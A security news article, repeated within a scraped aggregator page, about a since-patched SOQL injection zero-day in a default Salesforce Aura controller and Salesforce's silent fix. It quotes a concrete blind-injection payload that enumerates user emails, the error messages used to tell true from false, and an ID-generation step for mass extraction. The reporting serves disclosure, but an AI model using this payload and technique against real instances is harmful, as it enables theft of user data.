.jpg)
![[The AI Show Episode 151]: Anthropic CEO: AI Will Destroy 50% of Entry-Level Jobs, Veo 3’s Scary Lifelike Videos, Meta Aims to Fully Automate Ads & Perplexity’s Burning Cash](https://www.marketingaiinstitute.com/hubfs/ep%20151%20cover.png)
![[DEALS] Internxt Cloud Storage: Lifetime Subscription (85% off) & Other Deals Up To 98% Off – Offers End Soon!](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![From electrical engineering student to CTO with Hitesh Choudhary [Podcast #175]](https://cdn.hashnode.com/res/hashnode/image/upload/v1749158756824/3996a2ad-53e5-4a8f-ab97-2c77a6f66ba3.png?#)
.jpg?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
.jpg?width=1920&height=1920&fit=bounds&quality=70&format=jpg&auto=webp#)
_Michael_Vi_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![Google Messages rolls out taller, 14-line text field [U]](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2024/06/Google-Messages-2.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![Apple Planning Futuristic 'Glasswing' iPhone With Curved Glass and No Cutouts [Gurman]](https://www.iclarified.com/images/news/97534/97534/97534-640.jpg)
Critical SOQL Injection 0-Day Vulnerability in Salesforce Affects Millions Worldwide
A critical zero-day vulnerability discovered in Salesforce‘s default controller has exposed millions of user records across thousands of deployments worldwide. The security flaw, found in the built-in aura://CsvDataImportResourceFamilyController/ACTION$getCsvAutoMap controller, allowed attackers to extract sensitive user information and document details through SOQL injection techniques. SOQL Injection 0-Day Vulnerability The vulnerability was discovered while conducting automated fuzzing […] The post Critical SOQL Injection 0-Day Vulnerability in Salesforce Affects Millions Worldwide appeared first on Cyber Security News.
A critical zero-day vulnerability discovered in Salesforce‘s default controller has exposed millions of user records across thousands of deployments worldwide.
The security flaw, found in the built-in aura://CsvDataImportResourceFamilyController/ACTION$getCsvAutoMap controller, allowed attackers to extract sensitive user information and document details through SOQL injection techniques.
SOQL Injection 0-Day Vulnerability
The vulnerability was discovered while conducting automated fuzzing tests on Aura controllers present in Salesforce deployments.
A custom parser and fuzzer was developed to test hundreds of endpoints by mutating input parameters across the application’s app.js file, which conveniently defines controller descriptors and required arguments.
According to security researcher Tobia Righi, the breakthrough came when the fuzzer returned an unexpected error message revealing unsafe parameter handling: “MALFORMED_QUERY: \nContentVersion WHERE ContentDocumentId = ”’\n ERROR at Row:1:Column:239\nunexpected token: ”'”.
This error indicated that the contentDocumentId parameter was being directly embedded into SOQL queries without proper sanitization, creating a pathway for injection attacks.
Despite SOQL’s inherent restrictions compared to traditional SQL injection vulnerabilities, the researcher successfully developed an exploitation technique using error-based blind injection methods.
The attack leveraged response discrepancies between valid and invalid queries to extract sensitive database information.
By crafting payloads such as 069TP00000HbJbNYAV’ AND OwnerId IN (SELECT Id FROM User WHERE Email LIKE ‘a%25’) AND ContentDocumentId != ‘, attackers could enumerate column contents from any object related to ContentDocument.
The technique exploited different server responses: successful subqueries returned “Cannot invoke “common.udd.EntityInfo.getEntityId()” because “ei” is null”, while unsuccessful ones returned “Error in retrieving content document”.
The researcher enhanced the attack by incorporating Salesforce ID generation techniques, using existing scripts to generate thousands of valid contentDocumentId values starting with the prefix “069”.
This allowed systematic extraction of document names, descriptions, and user details from both public and private ContentDocument objects across the platform.
Patch Released
After reporting the vulnerability to an affected organization, the researcher learned that the vulnerable controller was actually part of Salesforce’s default installation, not custom code.
When subsequently reported to Salesforce in late February 2025, the company quietly patched the vulnerability without issuing a public advisory, CVE designation, or acknowledgment in release notes.
The vulnerability’s impact extends far beyond individual organizations, as the affected controller was present in all Salesforce deployments by default.
The silent patching approach, while resolving the immediate security risk, has left the security community without official guidance on detection methods or potential indicators of compromise from the vulnerability’s exploitation window.
Try Next-gen Antivirus that Elevates Endpoint Protection – Try for Free
The post Critical SOQL Injection 0-Day Vulnerability in Salesforce Affects Millions Worldwide appeared first on Cyber Security News.
.webp?#)
